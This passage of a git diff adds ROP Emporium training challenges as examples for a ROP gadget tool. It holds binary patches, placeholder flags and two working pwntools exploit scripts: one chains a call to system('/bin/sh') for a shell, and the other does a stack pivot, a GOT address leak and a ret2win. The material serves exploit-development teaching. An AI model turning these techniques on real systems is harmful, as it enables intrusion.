zcdL!V<5E8?T6p6JPvvPme&a(jzjj}g`jzwby2LBj!=K5K&-y$o^(*rt^AJG5XPsOL
zTq9SW(gxfwPqP8IU*6^BD*BehE8n|YtLWb;@ya~P=d0-7Uj=_u`SIpmehyso#7gW7
zRs0+S9>#j`=95k+e5>cZJ0<;8=9$h_@gKqm*snhy1nxKftyT1I1ir*4F1k$l<*`I8
zXXougBB95SvDwhoYi?YBOCJ(Zb9pDzPMb&sWso>B&3M)vOl1e6DKl<ob9pmb*e+t(
z^l%EN;<*0t*0xrEC7IDOqq$sk1j!&9r|JY9rOkLDogRUSi<2p^GF8eg$&?j3IcN?P
z5-{lLUArk_MsDb)q?znE*W>xDITX#rDNEM<sT<aATHgf?Bz?_@q0Ef#UO-5wv4eFR
zZ|q#V(Y&#z=axvH*|)ZHV+3yBCI3blvyKjTN=v1^oSd0QB-43LqO4q^GI6%dq*2l>
zRxX!$xN^vqyz}G^o!niyw#>Y_Q*qoPCG+Si<Wcv@7E)f&qeTPr9+Hn9E1B99dVVBr
zM+ZRdoI{7WhRc_w4`vGbKp~lmU!9B#$qhyGLqd;_WMJt~JLgEY;U<>MX37{7vYeHQ
zl7XrXr);6i)^$|%!7NzY!o^UR6Qk#{GGnP*Luwrk#o>fG$JAMnjs@306N4I>iKde=
z^dW1Ldmxnl)RFxZI$n)5mb=dj`Cmfx-J~N9USnDKe8+UD!kMUR0keX>uW#c_&Gvi_
zWJ=#zDtzAN@127R{6|a3I|SSFJ%j0TC7^bx%JzKz?*K-=*`Dt$O!=My6<M%NmK6gW
z-5J=P&!0>wJ}TUQ)??Za8Qnpc=W{Akjf_#K|I{}3pD-$MJRBSGe4b@GNgxWh&-NUD
z1~RhmBqbESM=_n0sAG>)T&aDw-wurW#rHhEXENpcqjDqL;yO{8YXD_?K1VZ^IRlqL
zSk;;C0`G30&)ZB{k6m#5%zxHn&*ws>2YKL>f!E)Dk3HY3neu&;+oQ2|moI^#{`36v
zIiKnG-O8wY`~NkMJ>LhIUgfd(w*Os^J>MIcKIF0Yw*Mo@oA8u|iSGpjqImVaJmt|s
zc-WrrA@%Rk{x`6t@nd_wuY}*D{SnyG+GBgZ*YN+TC&@Vqj~n-&*TG$ox!dRa&&w1P
z%5sO4e%YSsE0DPDOZOzzz~+*rQ(-%%fArY%eQL9^XFYb~<%<vy#_{ucajUZDIIG$J
z1p?}S3o9tf_NzU(8cu0LqKoiw+iumH)m2aC@>~M8XNY)ycNimjpX#`wHWtcT>3BGP
V-oNPm^lSeZZFVTPd7OLO|2I0;x!wQ(

literal 0
HcmV?d00001

diff --git a/examples/rop_emporium/fluff/exploit.py b/examples/rop_emporium/fluff/exploit.py
new file mode 100644
index 0000000..30bd5f8
--- /dev/null
+++ b/examples/rop_emporium/fluff/exploit.py
@@ -0,0 +1,16 @@
+from Exrop import Exrop
+from pwn import *
+
+binname = "fluff"
+rop = Exrop(binname)
+rop.find_gadgets(cache=True, add_opt="--depth 15")
+elf = ELF(binname, checksec=False)
+bss = elf.bss()
+system = elf.symbols['system']
+chain = rop.func_call(system, ("/bin/sh",), elf.bss())
+chain.dump()
+buf = b"A"*40
+buf += chain.payload_str()
+p = process("./fluff")
+p.sendlineafter("> ", buf)
+p.interactive()
diff --git a/examples/rop_emporium/fluff/flag.txt b/examples/rop_emporium/fluff/flag.txt
new file mode 100644
index 0000000..918aaf6
--- /dev/null
+++ b/examples/rop_emporium/fluff/flag.txt
@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}
diff --git a/examples/rop_emporium/fluff/fluff b/examples/rop_emporium/fluff/fluff
new file mode 100755
index 0000000000000000000000000000000000000000..a239a90d662581d2a1f62542d932229f2d491bfe
GIT binary patch
literal 9144
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

literal 0
HcmV?d00001

diff --git a/examples/rop_emporium/pivot/exploit.py b/examples/rop_emporium/pivot/exploit.py
new file mode 100644
index 0000000..aed1dee
--- /dev/null
+++ b/examples/rop_emporium/pivot/exploit.py
@@ -0,0 +1,37 @@
+from Exrop import Exrop
+from pwn import *
+
+context.terminal = "tmux splitw -h -f".split()
+binname = "pivot"
+p = process(binname)
+rop = Exrop(binname)
+elf = ELF(binname, checksec=False)
+libpivot = ELF("./libpivot.so", checksec=False)
+buf = b"A"*0x28
+ret = 0x00000000004007c9 # for padding
+
+rop.find_gadgets(cache=True)
+puts = elf.symbols['puts']
+footholdgot = elf.got['foothold_function']
+foothold = elf.symbols['foothold_function']
+main = elf.symbols['main']
+
+p.recvuntil(": ")
+pivot_addr = int(p.recvuntil("\n", drop=True), 16)
+
+pivot_chain = rop.stack_pivot(pivot_addr, avoid_char=b"\x0a")
+pivot_chain.dump()
+chain2 = rop.func_call(puts, (footholdgot,))
+chain2.dump()
+pay = buf + pivot_chain.payload_str()
+
+rop = p64(foothold) + chain2.payload_str() + p64(main)
+p.sendlineafter("> ", rop)
+p.sendlineafter("> ", pay)
+p.recvuntil("libpivot.so")
+leak = u64(p.recvuntil("\n", drop=True).ljust(8, b"\x00"))
+libpivot.address = leak - libpivot.symbols['foothold_function']
+ret2win = libpivot.symbols['ret2win']
+print(hex(libpivot.address))
+p.sendlineafter("> ", buf + p64(ret) + p64(ret2win))
+p.interactive()
diff --git a/examples/rop_emporium/pivot/flag.txt b/examples/rop_emporium/pivot/flag.txt
new file mode 100644
index 0000000..918aaf6
--- /dev/null
+++ b/examples/rop_emporium/pivot/flag.txt
@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}
diff --git a/examples/rop_emporium/pivot/libpivot.so b/examples/rop_emporium/pivot/libpivot.so
new file mode 100755
index 0000000000000000000000000000000000000000..ea85a31688b222cc34d2af703849b05665e75d76
GIT binary patch
literal 8680
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
A761SM

literal 0
HcmV?d00001

diff --git a/examples/rop_emporium/pivot/pivot b/examples/rop_emporium/pivot/pivot
new file mode 100755
index 0000000000000000000000000000000000000000..5531957ba5a55d008e5130015e4ddea1c8ab3fbf
GIT binary patch
literal 13384
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
